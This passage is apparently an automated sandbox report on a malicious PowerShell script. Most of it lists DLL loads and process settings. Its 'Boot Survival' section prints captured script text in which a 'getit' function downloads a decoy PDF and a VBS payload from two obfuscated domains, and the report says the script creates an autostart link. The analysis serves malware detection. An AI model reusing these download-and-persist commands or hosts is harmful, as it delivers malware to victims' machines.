      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1357601906.0000021EF0D73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb% source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A669F1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdb_ source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: gement.Automation.pdbystem.C" source: powershell.exe, 00000008.00000002.1329928980.0000021ED6963000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353972064.0000021EF09D5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIJ source: powershell.exe, 00000005.00000002.1511182185.0000028A4E697000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb` source: powershell.exe, 00000008.00000002.1356025565.0000021EF0C66000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C1100D6C push eax; ret 8_2_00007FF7C1100D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htpovwww.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.pdf';getit -fz $flol -oulv 'http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
